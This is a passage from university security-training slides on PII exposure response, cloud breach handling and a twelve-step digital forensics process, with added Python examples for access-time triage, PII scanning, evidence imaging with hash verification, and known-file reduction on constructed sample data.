• Some of the folders definitely contain PII.
• Audit trail object access was not enabled.


Access Controls

Ran Spider (from Cornell University) to identify PII at risk:
• One month to scan 10 volumes on the file server.
• Identified all files accessed during the exposure period.

This significantly reduced the number of files at risk as 70.8% of all files were not accessed during the exposure period.

Is this a breach or an incident?

Regardless we need to mitigate the situation
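Scoping the exposure the way the slide describes, as an added example that is not Spider and not the slides' own scripts: with object-access auditing off, last-access timestamps are the only record of which files anyone read, so the script stats every file first (reading a file to look for PII can itself move its access time, which is also why the forensic copy on the earlier slide comes first), then scans only the files accessed inside the exposure window for an SSN-shaped pattern. The directory tree, its contents and its timestamps are constructed in a temporary directory; the six-day window copies the slide, and the function names are the example's own.

```python
"""Scope PII exposure after an ACL change: which files were read during the window?

Added example for this page, not the Spider tool or the slides' own scripts. It
mirrors the triage on the slide in two passes. Pass one records every file's
last-access time before anything else touches the tree, because reading a file
to look for PII can itself update that time. Pass two scans only the files whose
access time falls inside the exposure window for an SSN-shaped pattern. The
tree, its contents and its timestamps are constructed in a temporary directory;
the exposure window copies the slide (six days).
"""
import os
import re
import tempfile
import time

# 3-2-4 digit groups, excluding areas 000, 666 and 9xx and the all-zero groups
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")


def snapshot_access_times(root):
    """Pass one: (path, atime) for every file; os.stat does not change atime."""
    snap = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            snap.append((path, os.stat(path).st_atime))
    return snap


def accessed_in_window(snap, start, end):
    return [path for path, atime in snap if start <= atime <= end]


def scan_for_ssn(paths):
    """Pass two: count SSN-shaped strings per file; returns {path: count}."""
    hits = {}
    for path in paths:
        with open(path, "rb") as fh:
            text = fh.read().decode("utf-8", "replace")
        count = len(SSN_RE.findall(text))
        if count:
            hits[path] = count
    return hits


def atime_tracking_enabled(root):
    """Sanity check: if a read does not advance atime (noatime mounts, NTFS with
    last-access updates disabled), the 'not accessed' set proves nothing and the
    whole volume has to be treated as exposed."""
    probe = os.path.join(root, ".atime-probe")
    with open(probe, "w") as fh:
        fh.write("probe")
    week_ago = time.time() - 7 * 86400
    os.utime(probe, (week_ago, time.time()))
    with open(probe) as fh:
        fh.read()
    advanced = os.stat(probe).st_atime > week_ago + 3600
    os.remove(probe)
    return advanced


def triage_exposure(root, exposure_start, discovered):
    snap = snapshot_access_times(root)             # stat everything first
    touched = accessed_in_window(snap, exposure_start, discovered)
    hits = scan_for_ssn(touched)                   # only now read file contents

    def rel(path):
        return os.path.relpath(path, root).replace(os.sep, "/")

    return {
        "total_files": len(snap),
        "accessed_in_window": sorted(rel(p) for p in touched),
        "pii_files_at_risk": sorted(rel(p) for p in hits),
    }


def build_exposed_tree():
    """Constructed staff share: returns (root, exposure_start, discovered)."""
    root = tempfile.mkdtemp(prefix="acl-exposure-")
    now = time.time()
    exposure_start = now - 6 * 86400   # ACLs changed six days ago, as on the slide
    discovered = now - 3600            # permissions fixed an hour ago
    samples = {  # relative path: (content, last-access time)
        "hr/payroll.txt": ("Jane Roe 123-45-6789 salary review", now - 2 * 86400),  # read during window
        "hr/old-memo.txt": ("no identifiers here", now - 30 * 86400),              # untouched
        "it/notes.txt": ("ticket 456-78-9012 escalated", now - 40 * 86400),         # PII, not accessed
        "it/readme.txt": ("hello", now - 86400),                                    # accessed, no PII
    }
    for relpath, (content, atime) in samples.items():
        path = os.path.join(root, relpath)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)
        os.utime(path, (atime, now - 10 * 86400))  # (atime, mtime): written before the window
    return root, exposure_start, discovered


if __name__ == "__main__":
    root, start, end = build_exposed_tree()
    print("access-time tracking usable:", atime_tracking_enabled(root))
    print(triage_exposure(root, start, end))
```

Run atime_tracking_enabled on the real volume before trusting the reduction: the slide's figure (70.8% of files not accessed) is only meaningful where reads actually update access times, and on a volume that does not record them the honest answer is that every file with PII was exposed.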


Access Control Incident Response

Discovery
• Reported by University staff
• Root cause was analyzed
• Used Spider to scan affected volumes for PII
Short-term mitigation
• Inheritance and permissions were fixed
• Access dates for all files on affected volumes were analyzed to determine the scope of risk
• All affected PII was identified
Notification
• Met with General Counsel and the CIO
• Contacted the Oregon Division of Finance and Corporate Securities
• Determined this was not a breach (by risk-of-harm analysis)
• Sent email to users with PII
Long-term mitigation
• Legacy PII discovery effort
• Provide secure enterprise storage for future PII
• Establish enterprise PKI for encryption infrastructure
• Publish procedures requiring the use of encryption
Awareness
• Presentations to HR admins, executive admins, staff
• Presentations to technical admins about plans and timetables


Website in the Cloud Defaced

A website of yours that is hosted in a cloud is defaced. Parts of this website can access sensitive data that is also stored in the Cloud.


Website in the Cloud Defaced

In January 2010, shortly after President Obama finished his State of the Union address, the webpages of 49 Congressional members were defaced. All of the webpages were managed by GovTrends. GovTrends ironically had the phrase “You get what you pay for” on their website.

In August 2009, 18 Congressional member websites, also managed by GovTrends, were defaced.


Website in the Cloud Defaced

Following the August attack, Representative B sent a letter to the CAO (Chief Administrative Officer) of the House, asking for actual details of the attack and a plan for notification of these incidents in the future.

Rep. B’s office contacted GovTrends and requested copies of the appropriate logs. GovTrends redirected him to HRIS. HRIS claimed they do not investigate or prosecute since there is no way to track down the criminals responsible for this act.


Website in the Cloud Defaced

At a Cloud Law Summit Microsoft's head of legal, Dervish Tayyip, said the company would not provide financial guarantees against data-protection issues on cloud contracts.

"We're not an insurance company. What is important is that customers understand the [cloud] offerings are standardised — they are what they are. If the offering does not meet customer needs, maybe the cloud is not a realistic offering."

Cloud providers shrug off liability for securityBy Tom Espiner, ZDNet UK, 12 February, 2010 13:30


Cloud Incident Response

Discovery
• Prevented by the vendor's refusal to cooperate
Short-term mitigation
• Undetermined; experts claim the vendor's explanation makes no sense
Notification
• Can't determine risk of harm
Long-term mitigation
• Nothing in the press about it
Awareness
• Articles on the web


Breach Response for Clouds

Unlike in-house repositories of information, you cannot assume that you have the right and the authorization to investigate breaches in clouds. You must ensure that your contract with the cloud vendor permits you this capability.

If regulation requires that you protect your data from the cloud provider, then you must encrypt it and ensure that the contract does not contain a provision that would permit the vendor to investigate your content.

If the data that you store in the cloud includes FERPA-protected data, then the cloud provider must agree to act as a FERPA agent for the university and to protect it as such.

Your contract should bind the cloud vendor to meet any regulatory and legal requirements that you are required to meet.

Be aware that law enforcement may approach your cloud vendor and demand access to your data, even if you have reservations about the legality of the request.

Surrendering your data to a third party weakens your position that the data is valuable unless you have taken measures to affirm its value despite the transfer. These measures might include encrypting the data or contractually binding the cloud vendor to protect the data in accordance with its value or sensitivity.

Your contract should explicitly grant your security staff and administrators the rights that you require regarding monitoring and investigations.

For any cloud user interface, users should be informed that they have no expectation of privacy except that required by explicit law or regulation, and should agree that use of the cloud constitutes consent to monitoring. This would need to be spelled out contractually with your cloud vendor.


Breach Prevention for Clouds

Encrypting all data stored in the cloud keeps its loss outside the breach definition (the "secured" exemption above), provided the keys are not exposed along with the data. Two ways to get there:
• You encrypt the data before storing it
• You contract the cloud provider to encrypt your data: either full cloud encryption, or individually accountable encryption with a corporate key escrow

Must gather assurances that the cloud hosts have sufficient security (SAAP): SAS-70
Must gather assurances that the cloud application has sufficient security (SAAI): SysTrust or SAS-70
Must gather assurances that the cloud-based web application has sufficient security (SAAS): WebTrust, SAS-70, vulnerability assessments or penetration tests


Example Incident/Breach Response Plan

1. Review the exposed material and determine the scope and nature of the incident: the number of unique disclosures or opportunities for disclosure.
2. To the best of your ability, determine if there is any evidence that the exposed information was accessed.
3. Take actions to limit or eliminate the exposure.
4. Arrange a meeting with General Counsel, the CIO, and the list owner. Describe the incident, the disclosures, and the data found during the review. Determine whether the disclosure (or potential disclosure) meets the criteria in FERPA, GLBA, FISMA, HIPAA, the PCI standards, or state law or regulation such as the Oregon ID Theft Protection Act.
5. If it does, and there is no clear evidence of disclosure, determine the potential risk of harm.
6. Draft and send a response to the individual who identified the disclosure.
7. Draft a response to the individuals whose personally identifying information was exposed.
8. Determine the cause of the exposure. Determine a permanent solution and implement it.


Next Steps?

• Acquire PII search tools
• Design solutions for PII challenges
• Search for legacy PII
• Create strategy for searching PII at home
• Create awareness campaign for PII removal
• Establish a PII incident response team
• Determine breach thresholds and risk-of-harm criteria
• Develop PII template response letters to the reporting individual
• Secure known legacy PII
• Create PII awareness campaign
• Monitor for new PII
• Design monitoring strategy
• Gather info about pockets of legacy PII
• Create awareness campaign for PII removal at home
• Develop staff communications for departmental involvement
• Develop PII template response letters to the harmed individuals
• Develop reporting and record-keeping process
• Sustaining operations

Design solutions for PII challenges

• Whole disk encryption (pgpdisk)
• Enterprise supported file encryption (a PKI solution)
• Secure file server (Truecrypt)
• Personal file encryption (Winzip)
• Require network storage
• Segregate workstations that work with PII
• No use of home computers.
• Convert home computer to secure dumb workstation
• Provide secure laptops for remote use
• No dual use workstations for sensitive data
• Search all servers, databases, workstations for PII
• Create strategy to let users search for PII on existing home systems.
• Data Loss Prevention systems (Discovery, Prevention of loss, Protection of the data, Monitoring of PII use)
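The "Next Steps" slide calls for acquiring PII search tools and searching for legacy PII, and the list above repeats the point for servers, databases and workstations. The Python script below is an added example of what a minimal PII discovery tool looks like; it is not the workshop's tooling and not any of the products named above. The SSN structural rules, the Luhn check used to filter card-number candidates, the file-extension list and the sample files that demo() creates are all assumptions or constructed data.

```python
"""Minimal PII discovery scanner: finds candidate U.S. Social Security
numbers and payment card numbers in text files.  Added example; the
regexes, extension list and sample files are assumptions, not the
workshop's tooling."""
import re
from pathlib import Path

# Candidate SSN: NNN-NN-NNNN, excluding ranges the SSA never issues
# (area 000, 666 or 900-999; group 00; serial 0000).
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# Candidate card number: 13-19 digits, optionally separated by spaces/dashes.
# Deliberately broad; the Luhn check below does the filtering.
CARD_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")


def luhn_ok(digits: str) -> bool:
    """Luhn checksum; rejects most random digit runs that are not card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_text(text: str) -> dict:
    """Return counts of SSN candidates and Luhn-valid card candidates."""
    ssns = SSN_RE.findall(text)
    cards = [m for m in CARD_RE.findall(text)
             if luhn_ok(re.sub(r"[ -]", "", m))]
    return {"ssn": len(ssns), "card": len(cards)}


def scan_tree(root: Path, exts=(".txt", ".csv", ".log")) -> list:
    """Walk a directory and return (relative path, counts) for files with hits.
    Office/PDF/database formats would need their own text extractors."""
    hits = []
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in exts:
            continue
        counts = scan_text(p.read_text(errors="replace"))
        if any(counts.values()):
            hits.append((p.relative_to(root).as_posix(), counts))
    return hits


def demo() -> list:
    """Build a constructed sample tree in a temp dir and scan it."""
    import tempfile
    root = Path(tempfile.mkdtemp())
    # constructed sample data: one real-looking SSN, one in an unissued range
    (root / "old_roster.csv").write_text(
        "name,id\nAlice Example,123-45-6789\nBob Example,987-65-4321\n")
    # constructed: a well-known test card number plus a 13-digit order ref
    (root / "notes.txt").write_text(
        "Test card used for the demo: 4111 1111 1111 1111\n"
        "order ref 1234567890123\n")
    (root / "readme.txt").write_text("No sensitive data here, just 12345.\n")
    return scan_tree(root)


if __name__ == "__main__":
    for path, counts in demo():
        print(path, counts)
```

The two-stage design (broad pattern, then a structural or checksum filter) is what keeps a discovery scan usable: a bare "nine digits with dashes" or "sixteen digits" pattern on a file server produces far more false positives than a team can review, while the filtered output is small enough to act on.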

Remaining Issues

How do different states' breach notification laws apply to Educause member institutions?

What is the threshold for victim notification? AG notification?  

Is a breach insurance policy a good strategy? 

Should Educause/CIOs pursue agreements for credit monitoring, post-breach forensics, or other services?

Should Encryption be required?

Questions

Questions or Discussions

Craig A Schiller, CISSP-ISSMP, ISSAP
Chief Information Security Officer
Portland State University
503.725.9107

Step 1: Accusation or Incident Alert

Taking Notice of Suspicious Incidents

Circumstances that get the process started

Self-initiated incidents: “look for circumstances”

Directed incidents – respond to calls or alerts

What effect will this have on the evidence should this turn out to be “something”?

Step 2: Assessment

Has an incident, breach, or crime occurred?
• Triage – limited resources
• Look for elements of a specific crime
• Physical or serious financial injury?
• Can problem be contained/eliminated quickly?
• Extenuating circumstances?
• Notification required or desired?
• Continue investigation or stop here?

Step 3a: Incident/Crime Scene Protocols

Secure the Scene
• Electronic evidence is fragile and easily changed
• Keep scene from changing on purpose or accidentally
• Technical Working Group for Electronic Crime Scene Investigation Guide for First Responders: www.ncjrs.org/pdffiles1/nij/187736.pdf

Step 3b: Incident/Crime Scene Protocols

Document the Scene

Retain and document the state of the scene – need a standard, documented protocol

Step 4 - Identification or Seizure

Electronic Evidence
• Recognition and identification of the evidence.
• Documentation of the crime scene.
• Collection and preservation of the evidence.
• Packaging and transportation of the evidence.

Ways in Which Electronic Devices May be Evidence

"We see criminals use computers in one of three ways: First, computers are sometimes targeted for theft or destruction of their stored data… Second, computers are used as tools to facilitate traditional offenses… Third, computers are used to store evidence."

Janet Reno, U.S. Attorney General, Oct 28, 1996

Recognizing Electronic Evidence – User Created Files

• Address books
• E-mail files
• Audio/video files
• Image/graphics files
• Calendars
• Internet bookmarks or favorites
• Database files
• Spreadsheet files
• Documents or text files

Recognizing Electronic Evidence – Computer Created Files

• Backup files
• Log files
• Configuration files
• Printer spool files
• Cookies
• Swap files
• Hidden files
• System files
• History files
• Temporary files

Recognizing Electronic Evidence – Other Evidentiary Artifacts

• Bad clusters
• Computer date, time, and password
• Deleted files
• Free space
• Hidden partitions
• Lost clusters
• Metadata
• Other partitions
• Reserved areas
• Slack space
• Software registration information
• System areas
• Unallocated space

Recognizing Electronic Evidence – PDAs, E-Organizers, Mobile Phones

• Address book
• Calendars
• Appointment info
• Documents
• E-mail
• Handwriting
• Passwords
• Phone book
• Text messages
• Voice messages

Recognizing Electronic Evidence – Printers, Scanners, FAXes and Copiers

• “tool marks”
• Buffers
• Network Ids
• Usage log
• Proof of capability

Recognizing Electronic Evidence – Components

• Network cards: MAC address
• CPU: CPU serial number on newer Intel chips
• Cables and connectors: Missing device?

Recognizing Electronic Evidence – Other Devices to be Concerned With

• Smart Cards
• Dongles
• Answering Mach.: Caller ID info, Deleted Messages, Last number called, Phone numbers & names, Tapes
• Digital Cameras: Images, Removable cartridges, Sound, Time and date stamp, Video
• Memory Cards

Search for Evidence

Locard's Principle of Exchange - when any two objects come into contact, there is always transference of material from each object onto the other

What are you adding to the scene?

More Seizure and Identification

• Can’t seize everything – make informed, reasoned decisions about what to seize – normally guided by search warrant
• Document everything
  • Chain of custody
  • Authenticity
  • Later identification

Seizure - 1

Identify and remove all persons from the area – document their location at the time of entry – do not let anyone touch anything!

Interview (if possible) owners/users of electronic devices – try to get:
• passwords and user names
• documentation
• network topography
• encryption keys
• location of offsite storage

Seizure - 2

• Formulate a systematic search plan
• Document physical scene (power status, location of mouse, keyboard, monitor, etc.) – look for stickies!
• Photograph scene to create visual record
• Photograph monitor screen – may require videotaping
• Note peripherals and devices can contain latent prints – wear gloves!

Seizure - 3

Do not alter the condition of an electronic device – if it is off, leave it off!

Identify cables (phone lines, network lines, printers, etc.) - document, label and disconnect each cable from the wall if possible

You need to make a decision about volatile data (RAM, cache, etc.)

Seizure - 4

Transport hardware to evidence storage facility – or alternatively, do forensic analysis on site

Keep computer components away from magnetic items – radio modem in the back of a patrol car

Remember batteries can fail – make sure new ones are inserted as soon as practical

Step 5: Preservation

Create an exact duplicate of electronic storage devices and keep the original safely stored

Will have to provide copy of all exhibits to defense for examination

Work on duplicate in case your examination damages the contents

What does it mean to have an “exact duplicate”?
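An "exact duplicate" in this sense is a bit-for-bit copy of the whole device (including slack and unallocated space, which a file-level copy misses) whose integrity can be proven later by a hash that matches both the original and the image. The Python below is an added example of that workflow, not the workshop's code or any forensic product: it hashes the original before and after acquisition, copies it byte for byte, hashes the image, and writes a custody record that a later verify() can be checked against. The stand-in "device" is a constructed file in a temp directory, and the examiner name is a placeholder; a real acquisition would read a write-blocked block device.

```python
"""Step 5 worked example (added; not the workshop's code): bit-for-bit copy
of a storage device plus hash verification and a custody record.  The
'device' here is a constructed file; a real run reads a write-blocked
block device."""
import hashlib
import json
import shutil
from datetime import datetime, timezone
from pathlib import Path

CHUNK = 1 << 20  # 1 MiB reads keep memory flat on multi-GB devices


def sha256_of(path: Path) -> str:
    """Stream-hash a file so devices larger than RAM can be verified."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def acquire(source: Path, image: Path) -> dict:
    """Copy source byte for byte, hash before and after, return a custody record."""
    pre_hash = sha256_of(source)              # original, before anything touches it
    with source.open("rb") as src, image.open("wb") as dst:
        shutil.copyfileobj(src, dst, CHUNK)   # raw copy: no parsing, no filtering
    post_hash = sha256_of(source)             # shows the copy did not alter the original
    image_hash = sha256_of(image)
    return {
        "source": str(source),
        "image": str(image),
        "size_bytes": source.stat().st_size,
        "source_sha256_before": pre_hash,
        "source_sha256_after": post_hash,
        "image_sha256": image_hash,
        "verified": pre_hash == post_hash == image_hash,
        "acquired_at": datetime.now(timezone.utc).isoformat(),
        "examiner": "EXAMINER-NAME-PLACEHOLDER",   # placeholder, fill from the case file
    }


def verify(image: Path, record: dict) -> bool:
    """Re-check a working copy or the defence's copy against the recorded hash."""
    return sha256_of(image) == record["image_sha256"]


def demo() -> tuple:
    """Acquire a constructed device, then show verification failing after the
    copy is altered (the situation 'work on a duplicate' is meant to survive)."""
    import tempfile
    work = Path(tempfile.mkdtemp())
    device = work / "suspect_usb.dd"           # constructed stand-in for a real device
    device.write_bytes(bytes(range(256)) * 4096 + b"DELETED-FILE-REMNANT")
    image = work / "suspect_usb.img"
    record = acquire(device, image)
    (work / "suspect_usb.json").write_text(json.dumps(record, indent=2))
    before_ok = record["verified"] and verify(image, record)
    with image.open("r+b") as f:               # simulate an examination that damages the copy
        f.seek(0)
        f.write(b"\xff")
    return before_ok, verify(image, record)


if __name__ == "__main__":
    print(demo())  # expected: (True, False)
```

The record's "before" and "after" hashes of the source are what answers the defence question the slide raises: they show the original was not changed by the acquisition, and the image hash lets anyone given a copy of the exhibit confirm they received the same bytes.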

Step 6: Recovery

• Extract deleted and encrypted files
• Recover all unavailable data whether or not it is related to the case – usually not done manually

Especially note what has been deleted and when

Step 7: Harvesting

• Organize the contents of the storage device
• Gather metadata
• Catalog what you have: Applications, data, images, documents, etc.

Step 8: Reduction

• Separate good from bad - Eliminate objects that are not related to the investigation
  • Commercial clipart, standard operating system DLLs, computer games, etc.
• Smallest set of digital information with highest value for proving allegations
• Beware of deleting exculpatory data!
• NIST National Software Reference Library: www.itl.nist.gov/div897/docs/nsrl.html

Step 9: Organization and Search

• Physically organize the reduced set
• Make sure every file is indexed so it can be found on the original hard drive
• Inverted links are helpful
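Steps 7, 8 and 9 are one pipeline: catalog the files with their metadata, eliminate the ones a known-file hash set (such as the NIST NSRL) identifies as stock operating-system or application content, and index what remains so every hit maps back to its path on the original disk. The Python below is an added example of that pipeline and is not the workshop's code; the "known good" hash set and the sample files are constructed (a real run would load NSRL hash data), and only exact hash matches are eliminated, so nothing unknown is discarded.

```python
"""Steps 7-9 worked example (added; not the workshop's code): harvest file
metadata, reduce by known-file hash set (NSRL-style), build an inverted
index back to the original paths.  Hash set and sample files are constructed."""
import hashlib
import re
from collections import defaultdict
from pathlib import Path

# Constructed stand-in for an NSRL-style known-file hash set (SHA-256 here).
KNOWN_GOOD = {
    hashlib.sha256(b"MZ fake os dll bytes").hexdigest(),
    hashlib.sha256(b"GIF89a fake clipart").hexdigest(),
}


def harvest(root: Path) -> list:
    """Step 7: catalog every file with path, size, mtime and hash."""
    catalog = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            st = p.stat()
            catalog.append({
                "path": p.relative_to(root).as_posix(),   # location on the original
                "size": st.st_size,
                "mtime": int(st.st_mtime),
                "sha256": hashlib.sha256(p.read_bytes()).hexdigest(),
            })
    return catalog


def reduce_set(catalog: list, known: set) -> tuple:
    """Step 8: split catalog into (keep, eliminated).  Only exact known hashes
    are eliminated; anything unknown stays so exculpatory data is not lost."""
    keep = [e for e in catalog if e["sha256"] not in known]
    gone = [e for e in catalog if e["sha256"] in known]
    return keep, gone


def build_index(root: Path, keep: list) -> dict:
    """Step 9: inverted index, lowercase token -> set of original paths."""
    index = defaultdict(set)
    for e in keep:
        text = (root / e["path"]).read_text(errors="replace")
        for tok in set(re.findall(r"[a-z0-9]{3,}", text.lower())):
            index[tok].add(e["path"])
    return dict(index)


def search(index: dict, *terms: str) -> set:
    """Paths containing every term (AND query); empty set if no term given."""
    sets = [index.get(t.lower(), set()) for t in terms]
    return set.intersection(*sets) if sets else set()


def demo() -> dict:
    """Run the pipeline over a constructed mini image tree."""
    import tempfile
    root = Path(tempfile.mkdtemp())
    (root / "Windows").mkdir()
    (root / "Users").mkdir()
    (root / "Windows" / "kernel32.dll").write_bytes(b"MZ fake os dll bytes")  # known-good
    (root / "Users" / "clip.gif").write_bytes(b"GIF89a fake clipart")          # known-good
    (root / "Users" / "memo.txt").write_text("Transfer the roster to the vendor tonight.")
    (root / "Users" / "chat.log").write_text("vendor says roster received, thanks")
    catalog = harvest(root)
    keep, gone = reduce_set(catalog, KNOWN_GOOD)
    index = build_index(root, keep)
    return {
        "cataloged": len(catalog),
        "kept": sorted(e["path"] for e in keep),
        "eliminated": sorted(e["path"] for e in gone),
        "roster_and_vendor": sorted(search(index, "roster", "vendor")),
        "tonight": sorted(search(index, "tonight")),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

Two design points carry over to real tooling: reduction removes only positive matches against a curated hash set (never "looks boring"), which is how the slide's warning about exculpatory data is honoured in code, and every index entry stores the original path, so a finding in the report can be located on the original disk rather than only in the examiner's working set.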

Step 10: Analysis

Review file contents within the context of the assertions to be proven

Try to refute the assertions as well – look for exculpatory evidence

Validate your findings

Step 11: Reporting

A detailed record of:
• what you found
• how you found it
• where it can be found on the original disk
• significance of what you found

Step 12: Persuasion & Testifying

• Present your findings to the triers-of-fact
• Convey technical issues to laypeople in a clear manner